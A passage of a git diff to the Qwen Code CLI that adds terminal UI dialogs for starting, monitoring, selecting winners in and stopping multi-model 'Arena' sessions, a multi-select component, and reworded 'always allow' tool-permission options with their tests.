ArenaSelectDialog({ + manager, + config, + addItem, + closeArenaDialog, +}: ArenaSelectDialogProps): React.JSX.Element { + const pushMessage = useCallback( + (result: { messageType: 'info' | 'error'; content: string }) => { + const item: HistoryItemWithoutId = { + type: + result.messageType === 'info' ? MessageType.INFO : MessageType.ERROR, + text: result.content, + }; + addItem(item, Date.now()); + + try { + const chatRecorder = config.getChatRecordingService(); + chatRecorder?.recordSlashCommand({ + phase: 'result', + rawCommand: '/arena select', + outputHistoryItems: [{ ...item } as Record], + }); + } catch { + // Best-effort recording + } + }, + [addItem, config], + ); + + const onSelect = useCallback( + async (agentId: string) => { + closeArenaDialog(); + const mgr = config.getArenaManager(); + if (!mgr) { + pushMessage({ + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }); + return; + } + + const agent = + mgr.getAgentState(agentId) ?? + mgr.getAgentStates().find((item) => item.agentId === agentId); + const label = agent?.model.modelId || agentId; + + pushMessage({ + messageType: 'info', + content: `Applying changes from ${label}…`, + }); + const result = await mgr.applyAgentResult(agentId); + if (!result.success) { + pushMessage({ + messageType: 'error', + content: `Failed to apply changes from ${label}: ${result.error}`, + }); + return; + } + + try { + await config.cleanupArenaRuntime(true); + } catch (err) { + pushMessage({ + messageType: 'error', + content: `Warning: failed to clean up arena resources: ${err instanceof Error ? err.message : String(err)}`, + }); + } + pushMessage({ + messageType: 'info', + content: `Applied changes from ${label} to workspace. Arena session complete.`, + }); + }, + [closeArenaDialog, config, pushMessage], + ); + + const onDiscard = useCallback(async () => { + closeArenaDialog(); + const mgr = config.getArenaManager(); + if (!mgr) { + pushMessage({ + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }); + return; + } + + try { + pushMessage({ + messageType: 'info', + content: 'Discarding Arena results and cleaning up…', + }); + await config.cleanupArenaRuntime(true); + pushMessage({ + messageType: 'info', + content: 'Arena results discarded. All worktrees cleaned up.', + }); + } catch (err) { + pushMessage({ + messageType: 'error', + content: `Failed to clean up arena worktrees: ${err instanceof Error ? err.message : String(err)}`, + }); + } + }, [closeArenaDialog, config, pushMessage]); + + const result = manager.getResult(); + const agents = manager.getAgentStates(); + + const items: Array> = useMemo( + () => + agents.map((agent) => { + const label = agent.model.modelId; + const statusInfo = getArenaStatusLabel(agent.status); + const duration = formatDuration(agent.stats.durationMs); + const tokens = agent.stats.totalTokens.toLocaleString(); + + // Build diff summary from cached result if available + let diffAdditions = 0; + let diffDeletions = 0; + if (isSuccessStatus(agent.status) && result) { + const agentResult = result.agents.find( + (a) => a.agentId === agent.agentId, + ); + if (agentResult?.diff) { + const lines = agentResult.diff.split('\n'); + for (const line of lines) { + if (line.startsWith('+') && !line.startsWith('+++')) { + diffAdditions++; + } else if (line.startsWith('-') && !line.startsWith('---')) { + diffDeletions++; + } + } + } + } + + // Title: full model name (not truncated) + const title = {label}; + + // Description: status, time, tokens, changes (unified with Arena Complete columns) + const description = ( + + {statusInfo.text} + · + {duration} + · + {tokens} tokens + {(diffAdditions > 0 || diffDeletions > 0) && ( + <> + · + +{diffAdditions} + / + -{diffDeletions} + lines + + )} + + ); + + return { + key: agent.agentId, + value: agent.agentId, + title, + description, + disabled: !isSuccessStatus(agent.status), + }; + }), + [agents, result], + ); + + useKeypress( + (key) => { + if (key.name === 'escape') { + closeArenaDialog(); + } + if (key.name === 'd' && !key.ctrl && !key.meta) { + onDiscard(); + } + }, + { isActive: true }, + ); + + const task = result?.task || ''; + + return ( + + {/* Neutral title color (not green) */} + + Arena Results + + + + + Task: + {`"${task.length > 60 ? task.slice(0, 59) + '…' : task}"`} + + + + + + Select a winner to apply changes: + + + + + !item.disabled)} + onSelect={(agentId: string) => { + onSelect(agentId); + }} + isFocused={true} + showNumbers={false} + /> + + + + + Enter to select, d to discard all, Esc to cancel + + + + ); +} diff --git a/packages/cli/src/ui/components/arena/ArenaStartDialog.tsx b/packages/cli/src/ui/components/arena/ArenaStartDialog.tsx new file mode 100644 index 000000000..6ce610887 --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaStartDialog.tsx @@ -0,0 +1,161 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import Link from 'ink-link'; +import { AuthType } from '@qwen-code/qwen-code-core'; +import { useConfig } from '../../contexts/ConfigContext.js'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { MultiSelect } from '../shared/MultiSelect.js'; +import { t } from '../../../i18n/index.js'; + +interface ArenaStartDialogProps { + onClose: () => void; + onConfirm: (selectedModels: string[]) => void; +} + +const MODEL_PROVIDERS_DOCUMENTATION_URL = + 'https://qwenlm.github.io/qwen-code-docs/en/users/configuration/settings/#modelproviders'; + +export function ArenaStartDialog({ + onClose, + onConfirm, +}: ArenaStartDialogProps): React.JSX.Element { + const config = useConfig(); + const [errorMessage, setErrorMessage] = useState(null); + + const modelItems = useMemo(() => { + const allModels = config.getAllConfiguredModels(); + const selectableModels = allModels.filter((model) => !model.isRuntimeModel); + + return selectableModels.map((model) => { + const token = `${model.authType}:${model.id}`; + const isQwenOauth = model.authType === AuthType.QWEN_OAUTH; + return { + key: token, + value: token, + label: `[${model.authType}] ${model.label}`, + disabled: isQwenOauth, + }; + }); + }, [config]); + const hasDisabledQwenOauth = modelItems.some((item) => item.disabled); + const selectableModelCount = modelItems.filter( + (item) => !item.disabled, + ).length; + const needsMoreModels = selectableModelCount < 2; + const shouldShowMoreModelsHint = + selectableModelCount >= 2 && selectableModelCount < 3; + + useKeypress( + (key) => { + if (key.name === 'escape') { + onClose(); + } + }, + { isActive: true }, + ); + + const handleConfirm = (values: string[]) => { + if (values.length < 2) { + setErrorMessage( + t('Please select at least 2 models to start an Arena session.'), + ); + return; + } + + setErrorMessage(null); + onConfirm(values); + }; + + return ( + + {t('Select Models')} + + {modelItems.length === 0 ? ( + + + {t('No models available. Please configure models first.')} + + + ) : ( + + + + )} + + {errorMessage && ( + + {errorMessage} + + )} + + {(hasDisabledQwenOauth || needsMoreModels) && ( + + {hasDisabledQwenOauth && ( + + {t('Note: qwen-oauth models are not supported in Arena.')} + + )} + {needsMoreModels && ( + <> + + {t('Arena requires at least 2 models. To add more:')} + + + {t( + ' - Run /auth to set up a Coding Plan (includes multiple models)', + )} + + + {t(' - Or configure modelProviders in settings.json')} + + + )} + + )} + + {shouldShowMoreModelsHint && ( + <> + + + {t('Configure more models with the modelProviders guide:')} + + + + + + {MODEL_PROVIDERS_DOCUMENTATION_URL} + + + + + )} + + + + {t('Space to toggle, Enter to confirm, Esc to cancel')} + + + + ); +} diff --git a/packages/cli/src/ui/components/arena/ArenaStatusDialog.tsx b/packages/cli/src/ui/components/arena/ArenaStatusDialog.tsx new file mode 100644 index 000000000..e4a48031a --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaStatusDialog.tsx @@ -0,0 +1,288 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useEffect, useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import { + type ArenaManager, + type ArenaAgentState, + type InProcessBackend, + type AgentStatsSummary, + isSettledStatus, + ArenaSessionStatus, + DISPLAY_MODE, +} from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { formatDuration } from '../../utils/formatters.js'; +import { getArenaStatusLabel } from '../../utils/displayUtils.js'; + +const STATUS_REFRESH_INTERVAL_MS = 2000; +const IN_PROCESS_REFRESH_INTERVAL_MS = 1000; + +interface ArenaStatusDialogProps { + manager: ArenaManager; + closeArenaDialog: () => void; + width?: number; +} + +function truncate(str: string, maxLen: number): string { + if (str.length <= maxLen) return str; + return str.slice(0, maxLen - 1) + '…'; +} + +function pad( + str: string, + len: number, + align: 'left' | 'right' = 'left', +): string { + if (str.length >= len) return str.slice(0, len); + const padding = ' '.repeat(len - str.length); + return align === 'right' ? padding + str : str + padding; +} + +function getElapsedMs(agent: ArenaAgentState): number { + if (isSettledStatus(agent.status)) { + return agent.stats.durationMs; + } + return Date.now() - agent.startedAt; +} + +function getSessionStatusLabel(status: ArenaSessionStatus): { + text: string; + color: string; +} { + switch (status) { + case ArenaSessionStatus.RUNNING: + return { text: 'Running', color: theme.status.success }; + case ArenaSessionStatus.INITIALIZING: + return { text: 'Initializing', color: theme.status.warning }; + case ArenaSessionStatus.IDLE: + return { text: 'Idle', color: theme.status.success }; + case ArenaSessionStatus.COMPLETED: + return { text: 'Completed', color: theme.status.success }; + case ArenaSessionStatus.CANCELLED: + return { text: 'Cancelled', color: theme.status.warning }; + case ArenaSessionStatus.FAILED: + return { text: 'Failed', color: theme.status.error }; + default: + return { text: String(status), color: theme.text.secondary }; + } +} + +const MAX_MODEL_NAME_LENGTH = 35; + +export function ArenaStatusDialog({ + manager, + closeArenaDialog, + width, +}: ArenaStatusDialogProps): React.JSX.Element { + const [tick, setTick] = useState(0); + + // Detect in-process backend for live stats reading + const backend = manager.getBackend(); + const isInProcess = backend?.type === DISPLAY_MODE.IN_PROCESS; + const inProcessBackend = isInProcess ? (backend as InProcessBackend) : null; + + useEffect(() => { + const interval = isInProcess + ? IN_PROCESS_REFRESH_INTERVAL_MS + : STATUS_REFRESH_INTERVAL_MS; + const timer = setInterval(() => { + setTick((prev) => prev + 1); + }, interval); + return () => clearInterval(timer); + }, [isInProcess]); + + // Force re-read on every tick + void tick; + + const sessionStatus = manager.getSessionStatus(); + const sessionLabel = getSessionStatusLabel(sessionStatus); + const agents = manager.getAgentStates(); + const task = manager.getTask() ?? ''; + + // For in-process mode, read live stats directly from AgentInteractive + const liveStats = useMemo(() => { + if (!inProcessBackend) return null; + const statsMap = new Map(); + for (const agent of agents) { + const interactive = inProcessBackend.getAgent(agent.agentId); + if (interactive) { + statsMap.set(agent.agentId, interactive.getStats()); + } + } + return statsMap; + // eslint-disable-next-line react-hooks/exhaustive-deps + }, [inProcessBackend, agents, tick]); + + const maxTaskLen = 60; + const displayTask = + task.length > maxTaskLen ? task.slice(0, maxTaskLen - 1) + '…' : task; + + const colStatus = 14; + const colTime = 8; + const colTokens = 10; + const colRounds = 8; + const colTools = 8; + + useKeypress( + (key) => { + if (key.name === 'escape' || key.name === 'q' || key.name === 'return') { + closeArenaDialog(); + } + }, + { isActive: true }, + ); + + // Inner content width: total width minus border (2) and paddingX (2*2) + const innerWidth = (width ?? 80) - 6; + + return ( + + {/* Title */} + + + Arena Status + + · + {sessionLabel.text} + + + + + {/* Task */} + + + Task: + "{displayTask}" + + + + + + {/* Table header */} + + + + Agent + + + + + Status + + + + + Time + + + + + Tokens + + + + + Rounds + + + + + Tools + + + + + {/* Separator */} + + {'─'.repeat(innerWidth)} + + + {/* Agent rows */} + {agents.map((agent) => { + const label = agent.model.modelId; + const { text: statusText, color } = getArenaStatusLabel(agent.status); + const elapsed = getElapsedMs(agent); + + // Use live stats from AgentInteractive when in-process, otherwise + // fall back to the cached ArenaAgentState.stats (file-polled). + const live = liveStats?.get(agent.agentId); + const totalTokens = live?.totalTokens ?? agent.stats.totalTokens; + const rounds = live?.rounds ?? agent.stats.rounds; + const toolCalls = live?.totalToolCalls ?? agent.stats.toolCalls; + const successfulToolCalls = + live?.successfulToolCalls ?? agent.stats.successfulToolCalls; + const failedToolCalls = + live?.failedToolCalls ?? agent.stats.failedToolCalls; + + return ( + + + + + {truncate(label, MAX_MODEL_NAME_LENGTH)} + + + + {statusText} + + + + {pad(formatDuration(elapsed), colTime - 1, 'right')} + + + + + {pad(totalTokens.toLocaleString(), colTokens - 1, 'right')} + + + + + {pad(String(rounds), colRounds - 1, 'right')} + + + + {failedToolCalls > 0 ? ( + + + {successfulToolCalls} + + / + {failedToolCalls} + + ) : ( + 0 ? theme.status.success : theme.text.primary + } + > + {pad(String(toolCalls), colTools - 1, 'right')} + + )} + + + + ); + })} + + {agents.length === 0 && ( + + No agents registered yet. + + )} + + ); +} diff --git a/packages/cli/src/ui/components/arena/ArenaStopDialog.tsx b/packages/cli/src/ui/components/arena/ArenaStopDialog.tsx new file mode 100644 index 000000000..65f363793 --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaStopDialog.tsx @@ -0,0 +1,213 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useCallback, useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import { + ArenaSessionStatus, + createDebugLogger, + type Config, +} from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { MessageType, type HistoryItemWithoutId } from '../../types.js'; +import type { UseHistoryManagerReturn } from '../../hooks/useHistoryManager.js'; +import { DescriptiveRadioButtonSelect } from '../shared/DescriptiveRadioButtonSelect.js'; +import type { DescriptiveRadioSelectItem } from '../shared/DescriptiveRadioButtonSelect.js'; + +const debugLogger = createDebugLogger('ARENA_STOP_DIALOG'); + +type StopAction = 'cleanup' | 'preserve'; + +interface ArenaStopDialogProps { + config: Config; + addItem: UseHistoryManagerReturn['addItem']; + closeArenaDialog: () => void; +} + +export function ArenaStopDialog({ + config, + addItem, + closeArenaDialog, +}: ArenaStopDialogProps): React.JSX.Element { + const [isProcessing, setIsProcessing] = useState(false); + + const pushMessage = useCallback( + (result: { messageType: 'info' | 'error'; content: string }) => { + const item: HistoryItemWithoutId = { + type: + result.messageType === 'info' ? MessageType.INFO : MessageType.ERROR, + text: result.content, + }; + addItem(item, Date.now()); + + try { + const chatRecorder = config.getChatRecordingService(); + chatRecorder?.recordSlashCommand({ + phase: 'result', + rawCommand: '/arena stop', + outputHistoryItems: [{ ...item } as Record], + }); + } catch { + // Best-effort recording + } + }, + [addItem, config], + ); + + const onStop = useCallback( + async (action: StopAction) => { + if (isProcessing) return; + setIsProcessing(true); + closeArenaDialog(); + + const mgr = config.getArenaManager(); + if (!mgr) { + pushMessage({ + messageType: 'error', + content: 'No running Arena session found.', + }); + return; + } + + try { + const sessionStatus = mgr.getSessionStatus(); + if ( + sessionStatus === ArenaSessionStatus.RUNNING || + sessionStatus === ArenaSessionStatus.INITIALIZING + ) { + pushMessage({ + messageType: 'info', + content: 'Stopping Arena agents…', + }); + await mgr.cancel(); + } + await mgr.waitForSettled(); + pushMessage({ + messageType: 'info', + content: 'Cleaning up Arena resources…', + }); + + if (action === 'preserve') { + await mgr.cleanupRuntime(); + } else { + await mgr.cleanup(); + } + config.setArenaManager(null); + + if (action === 'preserve') { + pushMessage({ + messageType: 'info', + content: + 'Arena session stopped. Worktrees and session files were preserved. ' + + 'Use /arena select --discard to manually clean up later.', + }); + } else { + pushMessage({ + messageType: 'info', + content: + 'Arena session stopped. All Arena resources (including Git worktrees) were cleaned up.', + }); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + debugLogger.error('Failed to stop Arena session:', error); + pushMessage({ + messageType: 'error', + content: `Failed to stop Arena session: ${message}`, + }); + } + }, + [isProcessing, closeArenaDialog, config, pushMessage], + ); + + const configPreserve = + config.getAgentsSettings().arena?.preserveArtifacts ?? false; + + const items: Array> = useMemo( + () => [ + { + key: 'cleanup', + value: 'cleanup' as StopAction, + title: Stop and clean up, + description: ( + + Remove all worktrees and session files + + ), + }, + { + key: 'preserve', + value: 'preserve' as StopAction, + title: Stop and preserve artifacts, + description: ( + + Keep worktrees and session files for later inspection + + ), + }, + ], + [], + ); + + const defaultIndex = configPreserve ? 1 : 0; + + useKeypress( + (key) => { + if (key.name === 'escape') { + closeArenaDialog(); + } + }, + { isActive: !isProcessing }, + ); + + return ( + + + Stop Arena Session + + + + + Choose what to do with Arena artifacts: + + + + + { + onStop(action); + }} + isFocused={!isProcessing} + showNumbers={false} + /> + + + {configPreserve && ( + + + Default: preserve (agents.arena.preserveArtifacts is enabled) + + + )} + + + + Enter to confirm, Esc to cancel + + + + ); +} diff --git a/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap b/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap index a872a8859..c46d18235 100644 --- a/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap +++ b/packages/cli/src/ui/components/extensions/steps/__snapshots__/ActionSelectionStep.test.tsx.snap @@ -1,33 +1,33 @@ // Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html exports[`ActionSelectionStep Snapshots > should render for active extension without update 1`] = ` -"● View Details +"› View Details Disable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render for disabled extension 1`] = ` -"● View Details +"› View Details Enable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render for disabled extension with update 1`] = ` -"● View Details +"› View Details Update Extension Enable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render for extension with update available 1`] = ` -"● View Details +"› View Details Update Extension Disable Extension Uninstall Extension" `; exports[`ActionSelectionStep Snapshots > should render with no extension selected 1`] = ` -"● View Details +"› View Details Enable Extension Uninstall Extension" `; diff --git a/packages/cli/src/ui/components/messages/StatusMessages.tsx b/packages/cli/src/ui/components/messages/StatusMessages.tsx index e6e945bbd..b6b026a28 100644 --- a/packages/cli/src/ui/components/messages/StatusMessages.tsx +++ b/packages/cli/src/ui/components/messages/StatusMessages.tsx @@ -75,7 +75,7 @@ export const SuccessMessage: React.FC = ({ text }) => ( export const WarningMessage: React.FC = ({ text }) => ( diff --git a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx index 11daefa3b..17b7ea44e 100644 --- a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx +++ b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.test.tsx @@ -138,17 +138,17 @@ describe('ToolConfirmationMessage', () => { { description: 'for exec confirmations', details: execConfirmationDetails, - alwaysAllowText: 'Yes, allow always', + alwaysAllowText: 'Always allow in this project', }, { description: 'for info confirmations', details: infoConfirmationDetails, - alwaysAllowText: 'Yes, allow always', + alwaysAllowText: 'Always allow in this project', }, { description: 'for mcp confirmations', details: mcpConfirmationDetails, - alwaysAllowText: 'always allow', + alwaysAllowText: 'Always allow in this project', }, ])('$description', ({ details, alwaysAllowText }) => { it('should show "allow always" when folder is trusted', () => { diff --git a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx index 34eb34cac..3946b0b05 100644 --- a/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx +++ b/packages/cli/src/ui/components/messages/ToolConfirmationMessage.tsx @@ -242,11 +242,19 @@ export const ToolConfirmationMessage: React.FC< value: ToolConfirmationOutcome.ProceedOnce, key: 'Yes, allow once', }); - if (isTrustedFolder) { + if (isTrustedFolder && !confirmationDetails.hideAlwaysAllow) { + const rulesLabel = executionProps.permissionRules?.length + ? ` [${executionProps.permissionRules.join(', ')}]` + : ''; options.push({ - label: t('Yes, allow always ...'), - value: ToolConfirmationOutcome.ProceedAlways, - key: 'Yes, allow always ...', + label: t('Always allow in this project') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', + }); + options.push({ + label: t('Always allow for this user') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }); } options.push({ @@ -315,11 +323,21 @@ export const ToolConfirmationMessage: React.FC< value: ToolConfirmationOutcome.ProceedOnce, key: 'Yes, allow once', }); - if (isTrustedFolder) { + if (isTrustedFolder && !confirmationDetails.hideAlwaysAllow) { + const rulesLabel = + 'permissionRules' in infoProps && + (infoProps as { permissionRules?: string[] }).permissionRules?.length + ? ` [${(infoProps as { permissionRules?: string[] }).permissionRules!.join(', ')}]` + : ''; options.push({ - label: t('Yes, allow always'), - value: ToolConfirmationOutcome.ProceedAlways, - key: 'Yes, allow always', + label: t('Always allow in this project') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', + }); + options.push({ + label: t('Always allow for this user') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }); } options.push({ @@ -382,21 +400,19 @@ export const ToolConfirmationMessage: React.FC< value: ToolConfirmationOutcome.ProceedOnce, key: 'Yes, allow once', }); - if (isTrustedFolder) { + if (isTrustedFolder && !confirmationDetails.hideAlwaysAllow) { + const rulesLabel = mcpProps.permissionRules?.length + ? ` [${mcpProps.permissionRules.join(', ')}]` + : ''; options.push({ - label: t('Yes, always allow tool "{{tool}}" from server "{{server}}"', { - tool: mcpProps.toolName, - server: mcpProps.serverName, - }), - value: ToolConfirmationOutcome.ProceedAlwaysTool, // Cast until types are updated - key: `Yes, always allow tool "${mcpProps.toolName}" from server "${mcpProps.serverName}"`, + label: t('Always allow in this project') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', }); options.push({ - label: t('Yes, always allow all tools from server "{{server}}"', { - server: mcpProps.serverName, - }), - value: ToolConfirmationOutcome.ProceedAlwaysServer, - key: `Yes, always allow all tools from server "${mcpProps.serverName}"`, + label: t('Always allow for this user') + rulesLabel, + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }); } options.push({ diff --git a/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx b/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx index bbebc1361..a5931119b 100644 --- a/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx +++ b/packages/cli/src/ui/components/messages/ToolGroupMessage.tsx @@ -6,7 +6,7 @@ import type React from 'react'; import { useMemo } from 'react'; -import { Box, Text } from 'ink'; +import { Box } from 'ink'; import type { IndividualToolCallDisplay } from '../../types.js'; import { ToolCallStatus } from '../../types.js'; import { ToolMessage } from './ToolMessage.js'; @@ -136,13 +136,6 @@ export const ToolGroupMessage: React.FC = ({ contentWidth={innerWidth} /> )} - {tool.outputFile && ( - - - Output too long and was saved to: {tool.outputFile} - - - )} ); })} diff --git a/packages/cli/src/ui/components/messages/ToolMessage.test.tsx b/packages/cli/src/ui/components/messages/ToolMessage.test.tsx index 0c44a8ed9..e5f846601 100644 --- a/packages/cli/src/ui/components/messages/ToolMessage.test.tsx +++ b/packages/cli/src/ui/components/messages/ToolMessage.test.tsx @@ -300,4 +300,55 @@ describe('', () => { ); expect(lastFrame()).toContain('MockAnsiOutput:hello'); }); + + it('renders rejected plan content with plan text still visible', () => { + const planResultDisplay = { + type: 'plan_summary' as const, + message: 'Plan was rejected. Remaining in plan mode.', + plan: '# My Plan\n- Step 1: Do something\n- Step 2: Do another thing', + rejected: true, + }; + + const { lastFrame } = renderWithContext( + , + StreamingState.Idle, + ); + + const output = lastFrame(); + expect(output).toContain('Plan was rejected. Remaining in plan mode.'); + expect(output).toContain('MockMarkdown:# My Plan'); + expect(output).toContain('- Step 1: Do something'); + expect(output).toContain('- Step 2: Do another thing'); + }); + + it('renders approved plan content with approval message', () => { + const planResultDisplay = { + type: 'plan_summary' as const, + message: 'User approved the plan.', + plan: '# My Plan\n- Step 1\n- Step 2', + }; + + const { lastFrame } = renderWithContext( + , + StreamingState.Idle, + ); + + const output = lastFrame(); + expect(output).toContain('User approved the plan.'); + expect(output).toContain('MockMarkdown:# My Plan'); + expect(output).toContain('- Step 1'); + expect(output).toContain('- Step 2'); + }); }); diff --git a/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx b/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx index e17dea39b..13286440b 100644 --- a/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx +++ b/packages/cli/src/ui/components/shared/BaseSelectionList.test.tsx @@ -93,12 +93,12 @@ describe('BaseSelectionList', () => { expect(mockRenderItem).toHaveBeenCalledWith(items[0], expect.any(Object)); }); - it('should render the selection indicator (● or space) and layout', () => { + it('should render the selection indicator (› or space) and layout', () => { const { lastFrame } = renderComponent({}, 0); const output = lastFrame(); // Use regex to assert the structure: Indicator + Whitespace + Number + Label - expect(output).toMatch(/●\s+1\.\s+Item A/); + expect(output).toMatch(/›\s+1\.\s+Item A/); expect(output).toMatch(/\s+2\.\s+Item B/); expect(output).toMatch(/\s+3\.\s+Item C/); }); diff --git a/packages/cli/src/ui/components/shared/BaseSelectionList.tsx b/packages/cli/src/ui/components/shared/BaseSelectionList.tsx index 15664ef95..aacc63421 100644 --- a/packages/cli/src/ui/components/shared/BaseSelectionList.tsx +++ b/packages/cli/src/ui/components/shared/BaseSelectionList.tsx @@ -138,7 +138,7 @@ export function BaseSelectionList< color={isSelected ? theme.status.success : theme.text.primary} aria-hidden > - {isSelected ? '●' : ' '} + {isSelected ? '›' : ' '} diff --git a/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx b/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx index 396ee8c3a..8ab45c2de 100644 --- a/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx +++ b/packages/cli/src/ui/components/shared/DescriptiveRadioButtonSelect.tsx @@ -66,7 +66,11 @@ export function DescriptiveRadioButtonSelect({ renderItem={(item, { titleColor }) => ( {item.title} - {item.description} + {typeof item.description === 'string' ? ( + {item.description} + ) : ( + item.description + )} )} /> diff --git a/packages/cli/src/ui/components/shared/MultiSelect.tsx b/packages/cli/src/ui/components/shared/MultiSelect.tsx new file mode 100644 index 000000000..b910430ba --- /dev/null +++ b/packages/cli/src/ui/components/shared/MultiSelect.tsx @@ -0,0 +1,193 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useCallback, useEffect, useMemo, useState } from 'react'; +import { Box, Text } from 'ink'; +import { theme } from '../../semantic-colors.js'; +import { useSelectionList } from '../../hooks/useSelectionList.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import type { SelectionListItem } from '../../hooks/useSelectionList.js'; + +export interface MultiSelectItem extends SelectionListItem { + label: string; +} + +export interface MultiSelectProps { + items: Array>; + initialIndex?: number; + initialSelectedKeys?: string[]; + onConfirm: (selectedValues: T[]) => void; + onChange?: (selectedValues: T[]) => void; + onHighlight?: (value: T) => void; + isFocused?: boolean; + showNumbers?: boolean; + showScrollArrows?: boolean; + maxItemsToShow?: number; +} + +const EMPTY_SELECTED_KEYS: string[] = []; + +function getSelectedValues( + items: Array>, + selectedKeys: Set, +): T[] { + return items + .filter((item) => selectedKeys.has(item.key)) + .map((item) => item.value); +} + +export function MultiSelect({ + items, + initialIndex = 0, + initialSelectedKeys = EMPTY_SELECTED_KEYS, + onConfirm, + onChange, + onHighlight, + isFocused = true, + showNumbers = true, + showScrollArrows = false, + maxItemsToShow = 10, +}: MultiSelectProps): React.JSX.Element { + const [selectedKeys, setSelectedKeys] = useState>( + () => new Set(initialSelectedKeys), + ); + const [scrollOffset, setScrollOffset] = useState(0); + + useEffect(() => { + setSelectedKeys((prev) => { + const next = new Set(initialSelectedKeys); + if ( + prev.size === next.size && + Array.from(next).every((key) => prev.has(key)) + ) { + return prev; + } + return next; + }); + }, [initialSelectedKeys]); + + const { activeIndex } = useSelectionList({ + items, + initialIndex, + isFocused, + // Disable numeric quick-select in useSelectionList — in a multi-select + // context, onSelect triggers onConfirm (submit), so numeric keys would + // accidentally submit the dialog instead of toggling checkboxes. + // Numbers are still rendered visually via the showNumbers prop below. + showNumbers: false, + onHighlight, + onSelect: () => { + onConfirm(getSelectedValues(items, selectedKeys)); + }, + }); + + const toggleSelectionAtIndex = useCallback( + (index: number) => { + const item = items[index]; + if (!item || item.disabled) { + return; + } + + setSelectedKeys((prev) => { + const next = new Set(prev); + if (next.has(item.key)) { + next.delete(item.key); + } else { + next.add(item.key); + } + return next; + }); + }, + [items], + ); + + useEffect(() => { + onChange?.(getSelectedValues(items, selectedKeys)); + }, [items, selectedKeys, onChange]); + + useKeypress( + (key) => { + if (key.name === 'space' || key.sequence === ' ') { + toggleSelectionAtIndex(activeIndex); + } + }, + { isActive: isFocused }, + ); + + useEffect(() => { + const newScrollOffset = Math.max( + 0, + Math.min(activeIndex - maxItemsToShow + 1, items.length - maxItemsToShow), + ); + if (activeIndex < scrollOffset) { + setScrollOffset(activeIndex); + } else if (activeIndex >= scrollOffset + maxItemsToShow) { + setScrollOffset(newScrollOffset); + } + }, [activeIndex, items.length, scrollOffset, maxItemsToShow]); + + const visibleItems = useMemo( + () => items.slice(scrollOffset, scrollOffset + maxItemsToShow), + [items, scrollOffset, maxItemsToShow], + ); + const numberColumnWidth = String(items.length).length; + const hasMoreAbove = scrollOffset > 0; + const hasMoreBelow = scrollOffset + maxItemsToShow < items.length; + const moreAboveCount = scrollOffset; + const moreBelowCount = Math.max( + 0, + items.length - (scrollOffset + maxItemsToShow), + ); + + return ( + + {showScrollArrows && hasMoreAbove && ( + ↑ {moreAboveCount} more above + )} + + {visibleItems.map((item, index) => { + const itemIndex = scrollOffset + index; + const isActive = activeIndex === itemIndex; + const isChecked = selectedKeys.has(item.key); + + const itemNumberText = `${String(itemIndex + 1).padStart( + numberColumnWidth, + )}.`; + const checkboxText = item.disabled ? '[x]' : isChecked ? '[✓]' : '[ ]'; + + let textColor = theme.text.primary; + if (item.disabled) { + textColor = theme.text.secondary; + } else if (isActive) { + textColor = theme.status.success; + } else if (isChecked) { + textColor = theme.text.accent; + } + + return ( + + + {checkboxText} + + {showNumbers && ( + + {itemNumberText} + + )} + + {item.label} + + + ); + })} + + {showScrollArrows && hasMoreBelow && ( + ↓ {moreBelowCount} more below + )} + + ); +} 